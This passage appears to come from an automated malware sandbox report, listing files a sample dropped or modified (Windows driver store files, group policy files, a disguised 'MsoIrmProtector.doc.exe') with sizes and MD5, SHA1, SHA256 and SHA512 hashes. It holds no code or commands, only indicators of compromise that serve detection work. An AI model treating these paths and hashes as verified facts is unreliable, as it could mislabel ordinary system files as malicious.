                                                                                                                                                                                                                                                                                                                      5b562b7f02a430b74d8faf8ccbfe1158efb9290af98f9ea6005a66952d400cf0b65a194cf6aa92aa96f1610dd6c00e02ba23867476bf91096763e7aa0cc5643b

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\buttonconverter.inf_amd64_73b807c3bed63b18\buttonconverter.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      548B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      3355a6eb83ef171aa0f8bdecd947209c

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      a7b69c96ed5f74812f14fd2b0d733d025784c954

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      2fb1e51664fff3000688ad628afe58188654021836d1d66e3d0864e3a39e8a46

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      b9c334ec9062ba0505c2ef16cfe5c350d61266bca92ed9999e31300514841e98e19ad41f9dc05fc3545f511de4d19657bb3fa48b4f36e42bb5aebb60154d9f11

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\ehstorpwddrv.inf_amd64_220e4fad6c84d016\EhStorPwdDrv.dll

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      148B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      68259d0f0a137b230cac43d433128319

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      a024d84c32a72efdccdf4b42d0956220c20995a2

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      5eedaa6d7ef61c2e5903c4690fc6758bb3546f8d0f98e0f8e908b106053bdb57

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      44f668bdcb19a079480c108cd306dd5d1072b2b955954a61a431bf2c4a4be44d640ed99a508fa24bb8fd993a6396be8afa343e47508d6b46675643860dccee2b

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\genericusbfn.inf_amd64_53931f0ae21d6d2c\genericusbfn.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      390B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      086f23f027ac7aad4c5b1c80e13b251f

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      e87c6316525d56e49b57eaca6eedd64594cb3dbc

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      a180324c3da990ebfa5126f1d3418fb0eb29f4f4fb2eef492378ca055ee87fdf

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      24c790f8751e31cb78d5bba137342e30fcf4c2916dbf7e64b796577585091737a1a1f3e4b882d700103f96ebcf02979d0bc90c78e4da6b94458b9cd9c33c7d64

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\hidir.inf_amd64_7bf4a320e4ec8b3d\hidir.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      335B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      489d54d8401ed93f5974142f3f1619cd

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      0f17aa0bfedb441bf77ab0dd3c96017add3cebd1

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      beb60c89776323239d9a3564ebb675584f75a73a4d2378dafe92d8d917c17cdb

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      3f7f5e1b00123189170cc0a242162d824cf0352def7653da2b6d79c5d5613cb5750d0a03412b50a21cc41bc45e6eb3290776c46530625a026208e655ed9348d0

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\ialpss2i_gpio2_cnl.inf_amd64_a60833fda31e9831\iaLPSS2i_GPIO2_CNL.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      255B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      33e578b05aa5d8dcbd6519b31dfa3aff

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      10e0509b2ee2babe9111fd865407f3462c40d84e

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      be1a03de709cef7d0c38cf61bfd3bd2d7891b18c9e4f71d0620b5bd3686e2619

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      327e5f047b509a9b38d69f64b24c75fd0daa35dfab96eb047bac14ca438535698884f214bf8d758b8313a9072907129f8d84a838db4bb71ccb8903748893ff25

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\ialpss2i_i2c_skl.inf_amd64_9d9dbb01837eba23\iaLPSS2i_I2C.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      610B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      8306e4ea9d6be1b01d64362129c9a919

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      c8b3c4bd020e6fa05903b199824f450a1c6a83dc

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      1a11177a05fdad4b6d361daff167a6d070414391141146d776da9e833abffcfb

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      ea7b1374eae9533b341919a2ebf611132f4608d16675b094986746f33ae05957e1870990268390c932b474607f80283acc3b3cbc3f38eeb778dc2c9f19892f99

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\lsi_sss.inf_amd64_503a2398f4c86893\lsi_sss.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      100B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      a5799488d337cb9148453832faab6f41

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      2686cd5f2e4fd6a935082be5ab90cca30ab6fc1a

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      c8d915db69720d307a46c559dfda7ab9cbef14fac579a1a89fbe3326a35828cd

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      2315a453e83990fa10a9817ce3b7697c191f58ff2af8b5027f8a024292475aba72af65375b4dec965b543adce51d54cdddec6e4556df583771e80d770586bda6

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\memory.inf_amd64_9af3a8a63d4cb5f9\pnpmem.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      576B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      faf4c75cda2d870bb1bb91f308d57163

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      491ac61befbe381051b80de9b322b00d5b76d928

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      bd8b57d59e17a6e65ae1129645844dfc61329e1ea4bbb802416676daccdd560a

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      75d3aa67308bb202c2de2f0e8fa0af61f9b609ebe756786674ad02f8060ea84fc948b8048a27e9e4560af3064ebb9f1ffb944e573030a6ae41f371ff640e681a

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\mlx4_bus.inf_amd64_4c426f3bebc68844\mlx4_bus.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      466B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      21c3c293011b10d6dc808b1b282bcd79

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      00b3c20231e0ec4e0cce44e1109b3f71e0fddb6f

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      35449378635f77ce33270512878e8bb6f0cb9622fb2ec265bf4278da9d6f0f35

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      5bc6e23122a82843a6004d647ba40a81694d5549997b269fea0780685660f816aecb3ec43ec129016aaede03ac385d2fb3f22ca092613d45a9fdd5475d1cbb9b

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\msmouse.inf_amd64_1793a485b491b199\sermouse.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      248B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      409447c8dfa14341779190e471b33295

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      7e6f248e773c50280e595ba9eeae4d463ad51b54

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      256d759469af84e4fab2c36bc687a30fa17d230250ca595ee93392ac64054451

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      4e4c2c9dcdd24792097eb0314dcc368a0a2369723908113bc358b44407a09fa7d97bd8f9d5393450ebe8305dcb4445a530407f168fc770126bf3e51e789f3518

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\netax88772.inf_amd64_5d1c92f42d958529\ax88772.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      357B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      c4179e46d5e1066400e06f7968d9b599

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      e667e066bd132fdb099a6b54beb3c56cf7cc4904

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      cd896e05d0d563f75ae218e4aaf1397323afcb89f6be2ff61149f9cad36439ef

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      35aba6f588b14c5ecd67961fb0e2d3f08aa856bf2c5e59ae2ea86a1cbeda41e19095ff1ad29b96ec46a728ed3164f2e94eee4c19507b77f71b4e6a318fde2c02

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\netl1c63x64.inf_amd64_4d6630ce07a4fb42\L1C63x64.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      330B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      3820aba0f5bff61687f84d38ecfa583d

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      4fc575e68391e4929d0497d4d8ce47d97b2f2ce1

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      7459f7194061ca3259ebadaf0bb905767e5addf010ec758050def8b8ed0ce823

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      7ddb7a20a5abfb7359dfff81ab9ffe07575a0916ba3f5f01cc758302ab923d9fe22603a5b8a0459a7f3ad36289312237cc173b6c21af196c2a2de5d13ca3c367

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\netrtwlanu.inf_amd64_1815bafd14dc59f0\rtwlanu.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      389B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      6eff3c2278128366584862df89d83853

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      961b57b15dc6be241c206eaebc5e812a17554372

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      5dd5c091c659fdc7c83c9f165a2995a3bcc4479d8a39345b2fc4f4ae3cb91bc1

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      3ba1f00bdb9d393e07ff863a3b9e5d0ad599619f62dc2b0ea79958a7c622f8eea69cedc7ae93e9919f13b30fc8198eddb533d082d4ee6a762fb0bec024a9190c

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\netwmbclass.inf_amd64_dba6eeaf0544a4e0\cxwmbclass.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      413B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      71381079a2780b73cc0614b3f9e6d0f5

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      bd9c8c08b6a0c76d8f256481db82711396ffadc7

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      991fa657d60169d4dd5a09e47ec69872308da869f90452954e5ca312bc83a1f2

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      969e404daf7ca17d9e3764bac201a93c5f39064c35b3c3b137b35b66f8e4499fe5a79a364aedbfb76534dc3494735bbdde869e140e0151f5bafbcc4e8cf2300f

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\ntprint4.inf_amd64_0958c7cad3cd6075\Amd64\V3HostingFilter.dll

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      366B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      000a568514b154b236ec84665492d167

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      978d929396c897d6159aca415d4b97e95f607f2c

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      0775373af800cbdb9083ad5fca65fa0e104ca1784896935b0900ce3320959d4b

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      6257cab6ef74ce2a634592252681e5297b0fc1dc0f6ce098216f9e229b2d1531c6a83432e72de01e9cd5fe01c2c5f9a60ed9c000fae88f723bfabb2e657a6606

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\rdvgwddmdx11.inf_amd64_e8336336d081cc11\rdvgogl64.dll

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      525B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      31cb85882ac67f0ecf2afe74c9e13d19

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      b873a4b4863186d2cd9af7973a1f52d62317b4d0

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      7ba163ef94ba1c06babfdf308dbc1d6149c79fe679822c7c4e10832a289d5275

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      a37021f10bebfe76742f3ee8de54ddcef737dfc9fd80c82ecf1c31bdf64af0bcf184a5933e5b25ca427923d3597db8f31722efa00ad90b791da655bde5f06232

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\sensorsalsdriver.inf_amd64_a6da30fe583368a4\SensorsAlsDriver.dll

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      95B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      ba08ee168c444996c4f90e7e970f388c

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      7ad965d121d20e5a9b97fbfabd9cd743cdaba182

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      c4a55f9e0298742b797cb99adb286311188592839fb649c441fb2c26793c3d95

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      10fad35677e149ab375eab238b978992283688f738e7a8bbd6d96ab045dafe5d2af304cb288f8055c89089f70bf0bb7afe3030bd1fe904cd2820c271e6e170ec

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\spaceport.inf_amd64_6383331cfa0a32be\spacedump.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      382B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      94b1e21702380fd60a25e733220c884a

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      c9c5423874b926f2dbe40e368c783de0939ea13a

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      e4f8619af869b4fda766a3038fd816c06d401a15b62fecd2ae68eda864c7eb13

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      351962e0cd644db6328ec69cd370d9eabdbcb9070b89083c83b384c328171edf455eb4dd8229ba1cc20c31a6eafdb3cf6e69cba1315c82fcd408a43ec6fa41fa

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\sti.inf_amd64_096c9e42fe4749d2\usbscan.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      538B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      363236cf8bba63de41484abbf67bc55e

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      4166511388835d81f3aa10c523559cee4b3f3612

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      71bd17ded1433470bae71d0a86af0ed58871effda517effd596c6761690b6126

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      22678f6eb3b46e5007c7acd8d9c239548db1de76b7725bdfba54a2036a2e0922c54201755bc3a5b8146e1a135a5526bdf92be4900b0e4a09a1058a83d681b23a

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\uaspstor.inf_amd64_63788a81c4c628c5\uaspstor.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      f6dd0b1e153713f9dbc897f7b6174e83

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      306d6b24465b33e9cf2ed3c1bf4a307fbb720d7b

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      41f12964990ae102ab6b2b85a6fd47d960e777b51c6bc639e694688bd6fc1de5

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      966b37e96e09b25718b11b5af72d560184499fde86c018a5ad469c2962267a6c8e67bf36c4b138f7a1d155a9514bc693649526be86e5bbf32faed2963f2a8538

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\umpass.inf_amd64_3daa9a904daf9501\umpass.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      364B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      540b52b7a156ed28d7a5cf3f1fdb12c0

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      8c4548dc12b9bc18b4ee55c249ef67c039550dd9

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      fc81cecd286d7a02e48aa901472eee9179376acb33683404520ed2616dfee7f5

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      494fde7cd9c753c8b14e170fa75e15949ea84fb9239e5d486c1a73f9652bb3df1f72991e20dd5897f250db93de93857a6fdc061634b0033299df84cd9ba78f41

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\usbvideo.inf_amd64_b401376fd0a39c95\usbvideo.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      468B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      7bea9bf12f7a063e5cc3c8b6c9f0c53c

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      755226e6453ce3e19730e2084add2e4d1200980f

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      322d846e698cb37ba251165859316102c3c5b9c52d0cf1945cfcbd97af5b5dd4

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      268001f9948b37433e594ba31c35ed57ed1dd72a4034d06153a0cd44ff1a62acc2be477e55e2f6cd57f86b6959b4b4dec9b8f1811f27bff891a8314ff8e2a684

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\vsmraid.inf_amd64_3d2bbc45931b8232\vsmraid.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      160B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      4539efde6ddc907a3d6284f329777baa

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      735c17079f185f619a4620c6c413d572e5e99245

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      680a01b159342abfe42778e759d313658a1cac07dfa732ce72d7e04dea069553

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      7c64946b238d757d2f1af1496141e174079a763409b0371debb586ee161389caf329cae6b2eee401b60d992264efdd0d2e2d9054201b0448bd39bd67e7b65036

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\wpdmtp.inf_amd64_42b97498c7087292\WpdMtpDr.dll

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      982B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      ee3268aa7c5ad932c37af23e509ae840

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      00b29f699dafc1d58ae2c0e4fade177374e8a95f

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      8e7f7e867f7e3a6c223a935e5d2366cc4ddb1d19217928911f9b43daa6eddc8b

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      dc574dfa1b320503adf8025d2c1b5839411bd15cd5ce97afecb57ba145e5d35b1057d500effbce24d3aa9dbe1b9f4131e623be90978f2e1fb68c33a3a4f78afb

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\wvmbus.inf_amd64_a192dbf28b4634a7\vmbuspipe.dll

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      607B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      a6b466abfcf3bac017200faf8467a713

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      e1b01a44adeab00413b41747c92bb3ec12cdbad2

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      e5848b3b88e1f904fc37e31988feb591cefa5cebf4c18387f5db63e1978bc7b8

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      c270f881a4af2c33a06280cf0502f687fd58846cb87089d774a7510b7a3a7ac40903a6b2a07256aa4c09f1dfdb9ccb7ea461e5fe355abee4d607c5cd05fc98c5

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\DriverStore\FileRepository\xusb22.inf_amd64_d0f2fd4c931f4672\xusb22.sys

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      209B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      67f6d7e0701f52d1a3143a9c967a776f

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      f9552ad1af56b301327817ef5a716abf8fd12908

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      263a0178077d1c981078112ec70405a9bace9787a07dfd0bdfaae23600204e88

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      11b5bc45edec7b9fda1b32baf5776096db3920a31cfe813713f7b2da9ee3d79ccbb60876cd0f89780fecd47af9b7b1605fae706d6a11cd6a24c96bec5c840eac

                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\GroupPolicy\gpt.ini

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      127B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      8ef9853d1881c5fe4d681bfb31282a01

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      a05609065520e4b4e553784c566430ad9736f19f

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

                                                                                                                                                                                                                                                                                                                    • C:\Windows\mydoc.rtf

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      223B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      06604e5941c126e2e7be02c5cd9f62ec

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      4eb9fdf8ff4e1e539236002bd363b82c8f8930e1

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      85f2405d1f67021a3206faa26f6887932fea71aea070df3efb2902902e2d03e2

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      803f5f2fddbf29fef34de184eb35c2311b7a694740983ca10b54ef252dd26cda4987458d2569f441c6dedc3478bea12b45bfd3566f1b256504a0869ad3829df7

                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      cdfd60e717a44c2349b553e011958b85

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      431136102a6fb52a00e416964d4c27089155f73b

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8

                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\GroupPolicy\gpt.ini

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      268B

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      a62ce44a33f1c05fc2d340ea0ca118a4

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      1f03eb4716015528f3de7f7674532c1345b2717d

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                                                                                                                                                                                                                                                                                    • \??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      512KB

                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                      df3e5b61f14c7576f9eb731a2591057e

                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                      4487f5faa4100dbf6772d5044d83580258a41c7b

                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                      18f06a0c292a39f6b43b5d747c4a38b6da5bf1f409b006bc507841a25fca7852

                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                      57eb9d3871f661f97dac82fe1ecce9be55c7589ff8ebf30a9d752b48b8a2b98912a9d33b047cb7835e9708ccc428e2a0b5e3ded719bed404cc1c672be920b943

                                                                                                                                                                                                                                                                                                                    • \??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe

                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                      512KB

                                                                                                                                                                                                                                                                                                                      MD5

